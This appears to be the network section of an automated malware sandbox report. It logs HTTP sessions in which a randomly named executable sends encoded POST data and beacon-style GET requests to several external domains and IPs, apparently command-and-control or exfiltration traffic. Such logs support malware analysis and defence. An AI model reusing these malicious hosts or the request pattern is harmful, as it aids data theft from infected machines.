                                        Data Ascii: 3h-p=AktOH2f76OxBGe2jBW2jdQCb+wS4QvAAAVcuTEiYogE1ER0Xdo/GUHtN+Fw46mwYVGqOsAeoGdZaKPlJ2rTaW9jfRqHEfOhjOVMQQ4fCt0vWvuPm0kdvS/MlmE479AC74m76z9SS7iy7i1lzex59w6ySo0ekFi6cua6H8ePjPdRI+WhQAZqqpNaCgBEPPn8luiB1Pks/8b6kcIuwwvjzBhtNHHDsHwxysl6qHslWFhGKf5Lwfj8lI/cKL4uT5dwHBqCL3FuMMUm/YqFN7kKSnujzoxxFpCYlq8wYdhM6ue/DyjaQ30q48vFs0d3s9hhyPGQ3wndvBHtE/5zquPkwQkqLSjf3lrxNa7HP7V6HSL84Wq8V1SDDLsJ6+5/ADUGTYtxNkaenn7hsN0pQstRD0TVBvERmLX6zE3cNqgbAeUeTX/hRwy0VBOPrmhjkNofp7IkMbZVc/c45tOqYB59wrplqOhAYbzF7AfZND0JS7AWVm8DRAZDuVLsQ24DbgTzk5jwXg/29A6cqcSGoDoO9enJn/ndtuUhjCgRganEcQubl72C2caVjMcboTVVnmA1KTsZ7j2lOX/qhYWPBep/EIPAIhJ6QassxqJj5zzCjSvRBZLexnyDKtprj8xAvgCqfG9Mxu2M++UtVlIJhJOt7CmHWL6BxzRqyf0TCNrAO0Yzpypbr+GjDgwrQF5/TMQ4YMkk4yVn6qWJn4ryHnL77J2l4+Kw3QeFrBndqS6HgXO7h/4A9LyipRQNjH47lo+JSc68i9rYo3cXNTwlvUVB9/Q7xm+tLxlLPoUUyTHeQnmy3CPArBKPLwnyhDqS33MkFc+NfR/rcsVq242TskCnXCFh1HjyhZrIyxw5ruVCoC3GTWj+Aa6EWKlIS+JUTWXry9v+X82bqrAvsPNouaCDSHI+E/ZLlgdPFyHAy1lSHQAnUk0HI4KVObksjL4fkuZBQ/B5T0LYrCrxHvQzWTz6bnhjd/WJq6kRq9rwFuA2KAxVfVmD [TRUNCATED]
                                         Sep 27, 2024 06:35:21.592946053 CEST | 462 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 27 Sep 2024 04:35:21 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         4 | 192.168.2.7 | 54956 | 38.180.87.102 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:35:23.533736944 CEST | 479 | OUT | GET /jnnq/?3h-p=NmFuEDzr5eFeCtWuKkyDdAT5pBmHANp/LwRnUjqHn3UIHiNVBdr0a0hC8Uo/xX06NEvduSSve8RMIpwru4iaTurXZ5DXU8xUW0YmSfLMnmzzx/fpl3VzGsdmuXcon1eA2keAu/eSz0b3&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.skystargazeguide.store
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                         Sep 27, 2024 06:35:24.168652058 CEST | 486 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 27 Sep 2024 04:35:24 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 31 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6b 79 73 74 61 72 67 61 7a 65 67 75 69 64 65 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 120<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.skystargazeguide.store Port 80</address></body></html>0


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         5 | 192.168.2.7 | 54957 | 43.154.104.247 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:35:29.838633060 CEST | 720 | OUT | POST /aqh8/ HTTP/1.1
                                        Host: www.nmh6.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.nmh6.site
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.nmh6.site/aqh8/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 30 38 38 66 43 4a 4f 54 58 7a 2f 48 6f 54 46 32 67 34 50 6e 69 6c 4a 4f 77 65 66 57 5a 67 36 4a 46 42 52 5a 75 59 76 73 72 57 2b 43 64 43 34 37 67 31 67 52 44 71 4c 4f 55 41 42 58 64 44 6c 6c 49 69 48 64 57 6a 55 6f 36 58 75 45 74 4b 58 77 68 57 7a 39 38 39 6a 63 2b 68 51 59 45 51 4f 34 33 51 4d 6d 35 36 78 38 52 57 69 70 4d 57 59 6d 55 70 62 56 43 63 46 70 73 55 6e 77 51 66 31 6a 6b 59 70 4d 78 41 56 49 38 44 79 71 79 4b 4b 46 47 51 38 75 5a 41 4a 4f 65 4d 38 54 33 6c 44 6a 64 55 31 46 54 6a 70 73 66 7a 48 31 73 50 6e 6e 46 41 42 5a 52 6a 73 2f 4f 6a 53 2f 6c 55 56 6c 78 50 70 4e 6a 55 36 49 54 44 51 39 63 4b 77 69 76 67 3d 3d
                                        Data Ascii: 3h-p=088fCJOTXz/HoTF2g4PnilJOwefWZg6JFBRZuYvsrW+CdC47g1gRDqLOUABXdDllIiHdWjUo6XuEtKXwhWz989jc+hQYEQO43QMm56x8RWipMWYmUpbVCcFpsUnwQf1jkYpMxAVI8DyqyKKFGQ8uZAJOeM8T3lDjdU1FTjpsfzH1sPnnFABZRjs/OjS/lUVlxPpNjU6ITDQ9cKwivg==


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         6 | 192.168.2.7 | 54958 | 43.154.104.247 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:35:32.379057884 CEST | 740 | OUT | POST /aqh8/ HTTP/1.1
                                        Host: www.nmh6.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.nmh6.site
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.nmh6.site/aqh8/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 30 38 38 66 43 4a 4f 54 58 7a 2f 48 6f 77 74 32 69 62 6e 6e 31 56 4a 4e 36 2b 66 57 4c 67 36 56 46 42 64 5a 75 63 66 38 6f 6b 61 43 64 69 6f 37 68 77 4d 52 43 71 4c 4f 4d 51 42 65 54 6a 6c 73 49 69 37 76 57 6a 6f 6f 36 58 36 45 74 50 37 77 68 6c 4c 2b 75 64 6a 53 79 42 51 61 5a 67 4f 34 33 51 4d 6d 35 36 4e 57 52 57 71 70 4d 6c 41 6d 55 49 62 57 4f 38 46 75 72 55 6e 77 47 76 31 76 6b 59 6f 76 78 45 63 76 38 47 2b 71 79 50 32 46 47 42 38 68 53 41 4a 49 44 38 39 67 33 51 6d 48 63 6d 78 65 56 56 6c 36 57 7a 6e 45 74 35 36 46 66 69 4e 31 50 79 55 45 4b 68 32 4a 79 79 49 51 7a 4f 74 56 75 32 4f 70 4d 30 31 58 52 59 52 6d 35 63 6e 50 35 4e 34 65 2f 50 67 57 2b 33 69 52 48 33 51 7a 46 73 55 3d
                                        Data Ascii: 3h-p=088fCJOTXz/Howt2ibnn1VJN6+fWLg6VFBdZucf8okaCdio7hwMRCqLOMQBeTjlsIi7vWjoo6X6EtP7whlL+udjSyBQaZgO43QMm56NWRWqpMlAmUIbWO8FurUnwGv1vkYovxEcv8G+qyP2FGB8hSAJID89g3QmHcmxeVVl6WznEt56FfiN1PyUEKh2JyyIQzOtVu2OpM01XRYRm5cnP5N4e/PgW+3iRH3QzFsU=


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         7 | 192.168.2.7 | 54959 | 43.154.104.247 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:35:34.934557915 CEST | 1753 | OUT | POST /aqh8/ HTTP/1.1
                                        Host: www.nmh6.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.nmh6.site
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.nmh6.site/aqh8/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 30 38 38 66 43 4a 4f 54 58 7a 2f 48 6f 77 74 32 69 62 6e 6e 31 56 4a 4e 36 2b 66 57 4c 67 36 56 46 42 64 5a 75 63 66 38 6f 6b 53 43 64 78 51 37 68 54 30 52 51 36 4c 4f 46 77 42 54 54 6a 6b 38 49 6d 58 52 57 6a 6c 64 36 52 32 45 69 4e 7a 77 6f 30 4c 2b 33 74 6a 53 74 78 51 58 45 51 4f 68 33 51 63 71 35 36 39 57 52 57 71 70 4d 6a 45 6d 44 4a 62 57 49 38 46 70 73 55 6e 30 51 66 30 36 6b 63 38 52 78 45 59 56 38 31 32 71 7a 76 47 46 4b 54 6b 68 66 41 4a 4b 41 38 39 34 33 51 69 59 63 6d 74 38 56 56 35 55 57 77 33 45 76 39 50 4a 59 43 41 71 54 51 51 66 4e 6e 69 36 39 67 4a 6b 37 4e 74 78 6c 6b 79 54 52 47 78 57 56 59 64 50 34 5a 71 72 6d 76 55 75 7a 4f 63 37 35 51 43 42 63 58 78 31 61 70 38 7a 76 44 33 68 66 70 49 56 63 44 76 61 4b 66 6f 31 4a 32 43 6e 72 56 64 71 4e 38 48 71 2f 38 2f 72 6a 56 67 34 5a 50 4d 4a 78 43 53 34 5a 41 6c 62 6e 56 52 76 33 36 30 6e 59 62 36 6d 6d 33 39 78 47 72 71 6a 6d 43 2f 51 6f 57 74 58 67 79 62 62 67 41 51 5a 2b 4a 73 72 50 46 76 35 61 39 35 54 42 4a 6a 4f 76 [TRUNCATED]
                                         Data Ascii: 3h-p=088fCJOTXz/Howt2ibnn1VJN6+fWLg6VFBdZucf8okSCdxQ7hT0RQ6LOFwBTTjk8ImXRWjld6R2EiNzwo0L+3tjStxQXEQOh3Qcq569WRWqpMjEmDJbWI8FpsUn0Qf06kc8RxEYV812qzvGFKTkhfAJKA8943QiYcmt8VV5UWw3Ev9PJYCAqTQQfNni69gJk7NtxlkyTRGxWVYdP4ZqrmvUuzOc75QCBcXx1ap8zvD3hfpIVcDvaKfo1J2CnrVdqN8Hq/8/rjVg4ZPMJxCS4ZAlbnVRv360nYb6mm39xGrqjmC/QoWtXgybbgAQZ+JsrPFv5a95TBJjOv [TRUNCATED]


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         8 | 192.168.2.7 | 54960 | 43.154.104.247 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:35:37.486563921 CEST | 466 | OUT | GET /aqh8/?3h-p=5+U/B9yLCC3fujBRlYTV20I98PveYGmvCXYzu/ftmHOnFysm+UcobObnCUFXWy45RBneaC03tE6NiMazv36XsdX71yQuORGTyAJPqKJQT0rpdkIxSLnsafg/tkq0RYEKr7ZU9FsrwT/u&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.nmh6.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         9 | 192.168.2.7 | 54961 | 13.248.169.48 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:36:03.912205935 CEST | 744 | OUT | POST /3632/ HTTP/1.1
                                        Host: www.sapatarias.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.sapatarias.online
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.sapatarias.online/3632/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 55 42 44 53 63 55 4f 36 4f 67 6c 6c 62 64 51 6e 33 6f 74 4e 49 55 4f 5a 50 73 6f 64 53 44 59 44 57 4f 45 33 6a 6d 33 72 6e 37 58 78 59 68 68 6e 38 48 34 78 71 4c 36 71 7a 75 6b 6b 36 59 71 48 68 62 79 6c 46 6f 6c 57 4c 4b 48 49 6b 4c 54 31 58 6a 43 71 4e 58 38 43 53 32 30 73 79 65 7a 6c 6d 68 58 47 63 48 57 2f 58 2f 44 78 70 38 4b 64 6f 50 47 69 74 62 42 49 31 33 7a 2f 41 6b 61 42 6a 52 68 43 2f 4c 47 63 51 75 64 51 54 57 34 6d 38 6e 55 49 52 50 6a 6e 5a 38 73 7a 50 6f 32 6c 4a 36 39 62 31 39 74 51 62 62 73 6e 55 37 78 63 47 47 6a 49 32 75 33 6f 36 7a 45 71 57 2b 69 6e 62 30 6c 30 64 51 35 66 4f 39 6d 4a 62 32 48 2b 6a 67 3d 3d
                                        Data Ascii: 3h-p=UBDScUO6OgllbdQn3otNIUOZPsodSDYDWOE3jm3rn7XxYhhn8H4xqL6qzukk6YqHhbylFolWLKHIkLT1XjCqNX8CS20syezlmhXGcHW/X/Dxp8KdoPGitbBI13z/AkaBjRhC/LGcQudQTW4m8nUIRPjnZ8szPo2lJ69b19tQbbsnU7xcGGjI2u3o6zEqW+inb0l0dQ5fO9mJb2H+jg==


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         10 | 192.168.2.7 | 54962 | 13.248.169.48 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 27, 2024 06:36:06.460464954 CEST | 764 | OUT | POST /3632/ HTTP/1.1
                                        Host: www.sapatarias.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.sapatarias.online
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.sapatarias.online/3632/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 55 42 44 53 63 55 4f 36 4f 67 6c 6c 61 34 59 6e 79 4c 31 4e 50 30 4f 61 52 63 6f 64 46 54 59 48 57 4f 34 33 6a 6e 44 37 6e 4a 7a 78 59 46 6c 6e 7a 6a 73 78 74 4c 36 71 38 4f 6b 39 35 6f 71 4d 68 62 2b 62 46 73 6c 57 4c 4b 6a 49 6b 4a 37 31 57 52 71 70 43 6e 38 36 48 6d 30 75 71 2b 7a 6c 6d 68 58 47 63 48 53 47 58 38 7a 78 70 73 36 64 70 75 47 6c 7a 4c 42 4c 68 6e 7a 2f 45 6b 62 70 6a 52 67 79 2f 50 48 33 51 72 5a 51 54 57 49 6d 79 54 49 4c 49 2f 6a 62 64 38 74 34 42 37 44 54 58 59 38 6c 79 50 78 55 43 63 63 67 63 74 73 2b 63 6b 76 6b 6f 2f 50 54 2b 78 67 63 42 59 2f 53 5a 31 68 73 51 79 4e 2b 52 4b 44 6a 57 6b 6d 36 31 64 72 59 55 43 42 63 42 64 52 7a 55 5a 5a 48 77 68 32 4c 34 46 45 3d
                                        Data Ascii: 3h-p=UBDScUO6Oglla4YnyL1NP0OaRcodFTYHWO43jnD7nJzxYFlnzjsxtL6q8Ok95oqMhb+bFslWLKjIkJ71WRqpCn86Hm0uq+zlmhXGcHSGX8zxps6dpuGlzLBLhnz/EkbpjRgy/PH3QrZQTWImyTILI/jbd8t4B7DTXY8lyPxUCccgcts+ckvko/PT+xgcBY/SZ1hsQyN+RKDjWkm61drYUCBcBdRzUZZHwh2L4FE=


                                        Session ID: 11 | Source: 192.168.2.7:54963 | Destination: 13.248.169.48:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:09.004013062 CEST | Bytes transferred: 1777 | Direction: OUT | Data:
                                        POST /3632/ HTTP/1.1
                                        Host: www.sapatarias.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.sapatarias.online
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.sapatarias.online/3632/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 55 42 44 53 63 55 4f 36 4f 67 6c 6c 61 34 59 6e 79 4c 31 4e 50 30 4f 61 52 63 6f 64 46 54 59 48 57 4f 34 33 6a 6e 44 37 6e 4a 37 78 59 77 78 6e 79 43 73 78 73 4c 36 71 78 75 6b 67 35 6f 71 52 68 62 6d 66 46 74 59 6a 4c 49 72 49 69 71 44 31 48 51 71 70 56 58 38 36 46 6d 30 7a 79 65 79 6e 6d 69 76 34 63 48 43 47 58 38 7a 78 70 76 69 64 75 2f 47 6c 78 4c 42 49 31 33 7a 37 41 6b 61 45 6a 52 35 4b 2f 50 4b 4d 54 59 52 51 54 79 73 6d 2b 47 55 4c 58 50 6a 64 61 38 74 72 42 37 66 41 58 59 78 55 79 4f 56 2b 43 62 6f 67 66 62 35 31 5a 48 6e 6c 36 4e 50 4a 2f 51 30 48 44 5a 54 6b 63 6b 31 4f 4e 77 52 50 56 4b 72 71 62 45 54 75 2b 5a 72 5a 46 43 6b 69 49 76 64 30 61 2b 59 64 6a 45 62 42 35 54 47 55 56 31 30 51 41 76 64 53 4c 47 4b 57 4b 43 39 4a 32 6b 2f 34 49 77 6a 4c 4b 79 76 74 2b 56 2f 34 55 6e 38 71 51 7a 4f 66 61 42 62 54 64 32 76 4e 47 49 67 6c 64 6b 76 45 78 49 2f 54 41 77 69 68 67 37 6c 65 5a 34 55 31 69 62 4c 6f 79 66 72 72 6c 5a 64 74 4d 68 34 39 79 73 45 6c 4a 78 37 64 4e 2b 76 4a 6e [TRUNCATED]
                                        Data Ascii: 3h-p= [TRUNCATED]


                                        Session ID: 12 | Source: 192.168.2.7:54964 | Destination: 13.248.169.48:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:11.549455881 CEST | Bytes transferred: 474 | Direction: OUT | Data:
                                        GET /3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.sapatarias.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Timestamp: Sep 27, 2024 06:36:12.006295919 CEST | Bytes transferred: 416 | Direction: IN | Data:
                                        HTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Fri, 27 Sep 2024 04:36:11 GMT
                                        Content-Type: text/html
                                        Content-Length: 276
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 68 2d 70 3d 5a 44 72 79 66 6a 61 4c 48 77 42 6e 55 71 55 41 7a 37 68 70 41 32 2f 68 47 50 39 65 42 7a 63 66 61 59 30 76 69 47 44 71 75 4b 6e 4c 63 54 6c 41 6b 6d 59 75 6b 2f 36 4d 31 4f 41 38 31 61 69 79 2b 4b 47 68 42 4e 51 2b 64 5a 4c 32 6d 59 4f 46 64 53 6a 48 56 45 6b 4c 49 57 34 74 36 4b 71 79 6b 69 50 4d 4a 41 43 32 61 4f 47 75 6f 38 6a 37 67 76 4f 2b 78 59 49 37 36 32 2f 46 5a 78 53 50 6a 53 45 31 36 61 79 57 65 65 63 33 26 79 50 3d 4d 78 58 48 64 6c 7a 70 51 72 64 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0"}</script></head></html>


                                        Session ID: 13 | Source: 192.168.2.7:54965 | Destination: 3.33.130.190:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:17.057209015 CEST | Bytes transferred: 738 | Direction: OUT | Data:
                                        POST /05bk/ HTTP/1.1
                                        Host: www.softillery.info
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.softillery.info
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.softillery.info/05bk/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 32 75 4e 4b 35 66 4e 62 52 67 78 73 4c 7a 46 79 38 52 44 6f 46 77 4d 6e 38 57 63 66 75 32 63 61 44 54 63 44 44 69 43 4b 58 68 33 50 46 53 36 2b 43 72 5a 31 32 37 49 57 44 56 53 50 59 50 50 35 70 70 54 5a 38 56 4a 68 63 55 4b 34 57 38 45 53 6f 62 6f 50 6b 6e 58 43 55 6d 45 4e 4f 75 42 55 76 69 62 39 4d 61 41 6c 62 33 64 4a 47 71 55 32 7a 62 6c 56 73 68 6e 53 55 4a 64 62 53 79 64 78 44 2b 54 4a 57 4d 77 7a 58 49 33 35 4a 35 4f 72 37 51 68 66 39 6e 75 77 34 71 33 53 52 34 4d 45 34 4a 32 33 76 4b 6c 54 4f 46 45 6f 62 6a 68 7a 71 7a 49 2b 54 31 51 49 42 73 77 71 49 48 49 76 31 75 37 4f 77 66 5a 4e 4e 2f 4a 53 66 6e 51 6e 56 51 3d 3d
